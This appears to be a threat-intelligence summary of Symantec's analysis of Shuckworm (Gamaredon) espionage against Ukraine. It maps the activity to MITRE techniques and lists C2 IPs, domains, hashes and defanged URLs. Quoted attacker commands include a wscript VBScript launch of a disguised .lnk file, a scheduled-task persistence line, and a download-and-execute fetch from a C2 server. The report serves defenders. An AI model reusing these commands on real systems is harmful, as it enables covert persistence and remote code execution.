Shuckworm (Gamaredon) continues its Ukraine-focused cyber-espionage campaigns, using phishing and living-off-the-land techniques to deploy backdoors and remote-access tools. Symantec’s investigation documents a multi-stage July–August 2021 operation in Ukraine, featuring VBScript backdoors, HTA/mshta usage, and a family of 7-zip dropper binaries that connect to various command-and-control servers. #Shuckworm #Pterodo #UltraVNC #Ukraine
Keypoints
- Shuckworm (Gamaredon) has attacked Ukrainian entities since 2013 with a focus on cyber-espionage.
- The group uses phishing emails to deliver backdoors (Pterodo) or freely available remote access tools (RMS, UltraVNC).
- Security Service of Ukraine (SSU) reports rising sophistication, including living-off-the-land techniques for credential theft and network movement.
- Symantec’s case study (July 14–August 18, 2021) shows an infection chain starting from a malicious Word document via phishing, with VBScript backdoors and a downloaded payload from a remote site.
- Persistence is achieved through multiple scheduled tasks, and attackers abuse mshta.exe to run HTA files, enabling broader script execution and evasion.
- New Pterodo variants and additional backdoors are dropped, with connections to multiple C2s and relays (including VNC components) to maintain control.
- IOC patterns highlight short-lived C2 domains/IPs, a small set of hosting providers, and numerous “d”-prefixed file names in targeted directories.
MITRE Techniques
- [T1566.001] Phishing – The attack chain began with a malicious document, likely sent via a phishing email. ‘The attack chain began with a malicious document, likely sent via a phishing email.’
- [T1059.005] Windows Script (VBScript) – VBScript is used to download and execute payloads via wscript.exe. ‘wscript.exe CSIDL_PROFILEsearchesdepended.lnk //e:VBScript //b’ and ‘Two additional VBS scripts are observed being executed via depended.exe.’
- [T1105] Ingress Tool Transfer – The backdoor downloads and executes a payload from a remote server. ‘The backdoor is used to download and execute CSIDL_PROFILEsearchesdepended.exe (94a78d5dce553832d61b59e0dda9ef2c33c10634ba4af3acb7fb7cf43be17a5b) from hxxp://92.242.62.131/wordpress.php?is=[REDACTED].’
- [T1053.005] Scheduled Task – The attackers create scheduled tasks to maintain persistence and run dropped scripts. ‘SCHTASKS /CREATE /sc minute /mo 10 /tn “deep-thoughted” /tr “wscript.exe ” CSIDL_COMMON_PICTURESdeep-thoughted.ppt //e:VBScript //b” /F’
- [T1218.005] Mshta – The Mshta utility is used to load and execute remote HTA content, often to bypass controls. ‘Mshta utility can execute Microsoft HTML Application (HTA) files and can be abused to bypass application control solutions.’
- [T1071.001] Web Protocols – The operators use HTTP-based channels to fetch payloads and communicate with C2. ‘download and execute … from hxxp://92.242.62.131/wordpress.php?is=[REDACTED].’
- [T1219] Remote Access Software – A VNC client is dropped and used to connect to a remote C2 server. ‘drop a VNC client and establishes a connection to a remote C&C server controlled by the attackers.’
Indicators of Compromise
- [IP] context – 92.242.62.131, 168.119.228.72, and other addresses used for C2 or payload delivery
- [Domain] context – arianat.ru, mucoris.ru, deep-pitched.enarto.ru, iruto.ru, deer-lick.chehalo.ru
- [SHA256] context – 0d4b8e244f19a009cee50252f81da4a2f481da9ddb9b204ef61448d56340c137 (descend.exe), 1ddc9b873fe4f4c8cf8978b6b1bb0e4d9dc07e60ba188ac6a5ad8f162d2a1e8f (deep-green.exe)
- [File name] context – depend ed.exe, deep-sunken.exe, deerbrook.ppt, deep-green.exe
- [URL] context – hxxp://92.242.62.131/wordpress.php?is=[REDACTED], hxxp://avirona.ru/7-ZIP.html, hxxp://168.119.228.72/crawled.php